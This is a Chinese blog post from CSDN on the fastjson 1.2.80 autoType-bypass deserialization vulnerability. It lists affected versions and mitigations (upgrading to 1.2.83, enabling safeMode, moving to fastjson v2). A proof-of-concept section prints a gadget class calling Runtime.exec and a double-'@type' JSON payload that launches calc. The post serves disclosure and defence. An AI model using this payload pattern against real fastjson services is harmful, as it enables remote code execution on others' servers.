fastjson 1.2.80版本反序列化漏洞:POC代码及规避方案(20220523)

已于 2022-05-29 09:22:00 修改
阅读量7.3k 收藏 3
点赞数 1
文章标签: java 安全 开发语言
于 2022-05-29 09:21:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Next_Second/article/details/125027020
版权

fastjson 1.2.80版本反序列化漏洞:POC代码及规避方案(20220523)

1. 漏洞描述

fastjson已使用黑白名单用于防御反序列化漏洞,经研究该利用在特定条件下可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。建议fastjson用户尽快采取安全措施保障系统安全。

2. 影响版本

1.2.80及以下版本,即 <= 1.2.80。

3. 规避方案(以下任选一种)

3.1 升级到最新版本1.2.83

<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.83</version>
</dependency>

3.2 开启safeMode

参考:https://github.com/alibaba/fastjson/wiki/fastjson_safemode

3.2.1 java代码中设置

ParserConfig.getGlobalInstance().setSafeMode(true);

3.2.2 JVM参数中设置

-Dfastjson.parser.safeMode=true

jvm参数设置

3.2.3 配置文件设置

# fastjson.properties 
fastjson.parser.safeMode=true

fastjson.properties 设置

3.3 使用fastjson v2版本,与v1版本不兼容

4. POC代码

poc类(代码中需要有该类)

package com.example.fastjson.poc20220523;

import java.io.IOException;

public class Poc20220523 extends Exception {
    public void setName(String str) {
        try {
            Runtime.getRuntime().exec(str);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

攻击代码:

主要是构造json串:

{
	"@type": "java.lang.Exception",
	"@type": "com.example.fastjson.poc20220523.Poc20220523",
	"name": "calc"
}

java代码解析:

    public static void main(String[] args) {
        String json = "{\"@type\":\"java.lang.Exception\",\"@type\":\"com.example.fastjson.poc20220523.Poc20220523\",\"name\":\"calc\"}";
        JSON.parse(json);
    }

效果截图:

效果截图

5. 代码地址:

https://github.com/YoungBear/FastjsonPoc

杨小熊的笔记
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
fastjson1.2.80反序列化漏洞POC代码规避方案
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-11 2991
解决方案2:safeMode加固 fastjson1.2.68级之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持autoType,可杜绝反序列化Gadgets类变种攻击(关闭autoType注意评估对业务的影响)。 开启方法: https://github.com/alibaba/fastjson/wiki/fastjson_safemode 1.2.83修复了此次发现的漏洞,开启safeMode是完全关闭autoType功能,避免类似问题再次发生,这可能会有
fastjson1.2.75暂未修补的反序列化漏洞
d3f4ult的博客
12-30 7448
目录前言旧版本漏洞回顾1.2.68的漏网之鱼“系统的白名单”"通行证""绕过" 前言 这几天在一直研究fastjson反序列化漏洞,从1.2.24版本开始一直到1.2.68版本,其漏洞分析及其利用在网上还是很多的,但不知是大佬们有意为之还是怎样,各博客上写的payload大致差不多,但其实在1.2.68的漏洞中,能用的思路不只有AutoCloseable这一个,还有其他方式也有可能导致RCE,我相信大佬们的手中依然有没有放出的payload。 其实1.2.75漏洞(在我看来确实是漏洞,因为确实执行了反序列化
探秘Java安全漏洞fastjson-RCE PoC工具包
gitblog_00074的博客
06-19 404
探秘Java安全漏洞fastjson-RCE PoC工具包 项目地址:https://gitcode.com/Lonely-night/fastjson_gadgets_scanner 在这个数字化的时代,软件安全至关重要,尤其是当我们谈论企业级应用时。开源社区一直是推动技术创新的重要力量,今天我们将深入探讨一个独特的开源项目——decomplie_jar和fastjson,这是一个专门针对Ja...
Fastjson < 1.2.68版本反序列化漏洞分析篇
程序猿DD
10-22 2009
点击上方蓝色“程序猿DD”,选择“设为星标”回复“资源”获取独家整理的学习资料!作者 |ale_wong@云影实验室来源 |https://www.anquanke.com/post...
漏洞分析】Fastjson1.2.80版本RCE漏洞原理
olga5abl的博客
10-24 2388
通过研究v1.2.50和v1.2.68的绕过方式,主要是在ObjectDeserializer接口的子类JavaBeanDeserializer中存在expectClass非空的checkAutoType调用,这也是绕过的关键。这就是Fastjson中引入AutoType的原因,但是也正因为这个特性,因为功能设计之初在安全方面考虑不周,给后续的Fastjson使用者带来了无尽的痛苦。但是,Fastjson在序列化及反序列化的过程中,没有使用Java自带的序列化机制,而是自定义了一套机制。
fastjson1.2.83反序列化漏洞
Coder的博客
07-13 7113
代码fastjson1.2.83反序列化漏洞
安全狗高危安全通告】fastjson1.2.80反序列化漏洞解决方案
bocco的博客
05-26 549
安全狗应急响应中心监测到Fastjson官方发布,Fastjson1.2.80版本中存在反序列化漏洞。攻击者可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。
Java代码审计——fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件
王嘟嘟的博客
03-31 4928
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 这一篇应该是最后一个网上能找到的poc分析了。 0x01 环境 参考 https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg
Java代码审计——fastjson 1.2.68 反序列化漏洞 文件写入
王嘟嘟的博客
03-24 3558
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 还有就是Java代码审计——fastjson 1.2.68 反序列化漏洞 SafeFileOutputStream文件操作 0x01 环境 maven <dependency> <groupId>com.esotericsoftware</groupId> <artifa
Java代码审计——fastjson 1.2.68 反序列化漏洞 FileOutputStream写文件
王嘟嘟的博客
03-25 7560
0x00 前言 反序列化总纲 主要是依赖Java代码审计——fastjson 1.2.68 反序列化漏洞 AutoCloseable 看了这个poc之后,就一直纠结,为啥只有openjdk >= 11才可以用,最后在调试+看了大部分文章之后才终于明白 0x01 环境 这里需要准备两个jdk,一个 1.8 一个11 0x02 环境约束 首先先来看一下Fastjson的构造参数选择: 通过createJavaBeanDeserializer进来 走到JavaBeanInfo.build 这里判断如果不
fastjson1.2.69反序列化远程代码执行漏洞介绍.docx
07-01
**Fastjson 1.2.69 反序列化远程代码执行漏洞详解** Fastjson 是阿里巴巴开源的一个高性能的 JSON 库,广泛应用于 Java 开发中,用于 JSON 的序列化和反序列化操作。然而,Fastjson 1.2.69 版本存在一个严重的反序...
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
这个漏洞主要源自Fastjson的`parseObject`和`parseArray`等方法,当解析包含特殊JSON格式的对象或数组时,Fastjson未能进行有效的安全校验,导致了反序列化过程中的代码执行。攻击者可以通过构造恶意的JSON字符串,...
FastJsonPoc.zip
07-05
标题“FastJsonPoc.zip”指的是一个包含有关Fastjson框架反序列化漏洞的攻击向量(Proof of Concept,PoC)的压缩文件。Fastjson是阿里巴巴开源的一个高性能的JSON库,广泛应用于Java开发中。然而,它曾存在一个严重...
FastJson漏扫.zip
04-02
FastJson漏洞通常涉及到不安全的数据反序列化,攻击者可能会通过构造恶意的JSON输入,导致远程代码执行。例如,2017年的CVE-2017-18342就是一个知名的FastJson RCE漏洞,攻击者可以通过精心设计的JSON对象在受影响...
fastjsonHelloWorld
06-02
对于Fastjson反序列化漏洞,一个POC可能包括构造一个恶意的JSON字符串,当这个字符串通过Fastjson进行反序列化时,能够触发潜在的安全问题。 例如,一个简单的POC可能涉及创建一个包含恶意代码的自定义Java类,并...
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
最新发布
qq_43700885的博客
07-29 610
1.导入hutool的maven依赖。2.复制一下代码执行。
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 367
1.导入hutool的maven依赖。2.直接复制一下代码运行。
Swagger使用Map接受参数时,页面如何显示具体参数及说
a1058926697的博客
07-26 659
后端使用Map接受参数,要求在swagger页面上显示具体的参数名称、类型及说明。当Map接受参数数量少时,可以使用Swagger自带的注解。自定义注解 @ApiGlobalModel。编写处理注解对应的插件。
fastjson1.2.80漏洞复现
09-14
要复现fastjson1.2.80漏洞,可以参考以下步骤: 1. 了解漏洞背景:根据的引用,了解Fastjson v1.2.80存在AutoType绕过反序列化漏洞。这个漏洞允许攻击者构造恶意的JSON数据,并通过反序列化操作执行恶意代码。 2. 配置漏洞环境:根据的引用,可以找到fastjson1.2.80漏洞分析和复现的链接。根据该链接的指导,配置一个漏洞环境来进行漏洞复现。 3. 构造恶意JSON数据:根据漏洞的特点,构造一个包含恶意代码的JSON数据。可以参考中的漏洞复现部分来构造恶意数据。 4. 进行反序列化操作:使用fastjson1.2.80反序列化构造的恶意JSON数据。 5. 观察执行结果:观察反序列化操作是否成功执行了恶意代码。如果成功执行了恶意代码,那么漏洞复现成功。 请注意,漏洞复现属于安全研究领域,应该在合法和授权的环境下进行,避免在未经授权的系统上进行任何未经允许的操作。漏洞复现的目的是为了帮助开发者了解漏洞的原理和影响,并采取相应的安全措施进行修复。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值